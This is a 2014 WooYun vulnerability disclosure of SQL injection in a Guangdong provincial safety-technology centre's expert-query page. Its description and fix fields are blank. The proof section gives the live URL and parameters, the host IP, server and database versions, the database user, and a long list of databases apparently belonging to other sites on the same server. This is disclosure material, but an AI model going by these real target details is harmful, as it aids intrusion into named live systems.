当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055380

漏洞标题:广东省安全生产技术中心SQL注射

相关厂商:广东省安全生产技术中心

漏洞作者: 雅柏菲卡

提交时间:2014-04-03 10:31

修复时间:2014-04-08 10:32

公开时间:2014-04-08 10:32

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-03: 细节已通知厂商并且等待厂商处理中
2014-04-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

...........

详细说明:

............

漏洞证明:

Target: 		http://www.gtcws.com/expert/expertquery.asp?page=2&field1=&field31=&field30=
Host IP: 124.172.154.22
Web Server: Microsoft-IIS/7.5
Powered-by: ASP.NET
DB Server: MSSQL 2000 with error
Resp. Time(avg): 271 ms
Current User: gisstexpert_f
Sql Version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Current DB: gisstexpert
System User: gisstexpert_f
Host Name: VHOST1512
Server Name: VHOST156188
master
tempdb
model
msdb
pubs
Northwind
nanjing
ppforylf
datacaima
SITEV11_PINMU
leawellgd
meiqin
datakeinau
sqxydz
yxwl998
sns2
yinlips
sypd
linshh
two
Dzmy
mrtab
mydns
ppfortechno
ab543ujj
sales_lyh
ppforbondnicn
dgsyxxnet
gisstexpert
ppfordgmk17
nbc
jtl_waybill
xiongyi
ProjectTestDB
wuzptest
tongyonghj
netdglbboftec
a7668china
feige
prjdb0001
jyyl
zongyue
aiou
yysz
17580net
wtm_1688
prjdb0002
peopleinblue
chinahotelbook
maoming
gongyuantang
ppforvictor
shoujipeijian
wewon
cnhediao
nanjingrefeng
jeecms
good4gold
xfdz_db
baodafushi
ZexinSql
zhryp_lhy
ppforhxlaser
yjk_members
fymall
cenbeltest1-db
tqkxd
ppforkingsav
mystore
gzdtship
ppforszjmgs
wei2012naer
Whir_ezEip_ye
hetc2012heng
ppforpusheng_f
xue
dghl
xtsms
dghuatong
jxmypj
hyjgSQL
ppforjmgs
xtxxxh_com
nlts-db
taishi
NaoKu_DB
ppforsndd
zj_db_en
ppforszseven
zj_db
baiqifashion
hysuccess
gana
eivarc_db
mooz
88cg8data
gzdwpcs
ppfordisplay
sxlg
zcwx
justimc
meiye01
ppforszjywl
jmvbca
hdhz
azyf
YiLongCutlery
dzcg_ljw675db
fqbos
alvin-fd
changsha
domains
ydpaimai
wuhanhuangpu
ppforrenenda
ljfdb
xhhlSQL
shoubiao
ppforshenzhen
chinadhia_d
acoo
rui_feng
three
gongli
minglian8
meishu
bhkjj
HDcenterService
asp4w
istobuy_DB
hkmingbodb
asp33
joy
netbar
imhh
gt
DB_ypss
szMainYw
bioempire
test-mssql
scgjl_sjk
ctihi88
heyu2009
leawelldb
gzhstech2009
oreshakernet
abcbook
58xksb
blbook
ikukecn
szptfec
gmxx
mondafebak
asp5
redtory
lan
eepm
3vfly
18bang_com
dynamic_YZ
orange
managePo
sq_shuping
fyyw
orenoa
sinrong
ppforgretecc
siruiyb
ppforecetdd
hk_yazhi
ppforkongngai
News
toy
hnjd
radareye
mukouchuan
web
gzzhiai
cactu
edenfoods
gzchangyingdb
CWHXT
newweb_zl
CWHXT1
ppforhengyi
JLGIFTS
atsmsDB
hkweb
huashi
gdnjk
mylincebase
vipyeah
tctyn
cnb7088_db
ebinfo
runsitea
jianzhujob
xiaodudu
usajcs
yisen
TC-Gold
wmnet
textliantuo
mrandd
HY_OA
zhuoou
db_ICare
torronbe
tinco
LB148
sibamboo
grx
HYMeiXi
danqi
sqlezoa
zxinet_data
foundcloud
LEMP
gdoffer

QQ截图20140403101722.png

修复方案:

.............................

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-08 10:32

厂商回复:

最新状态:

暂无


漏洞评价:

评论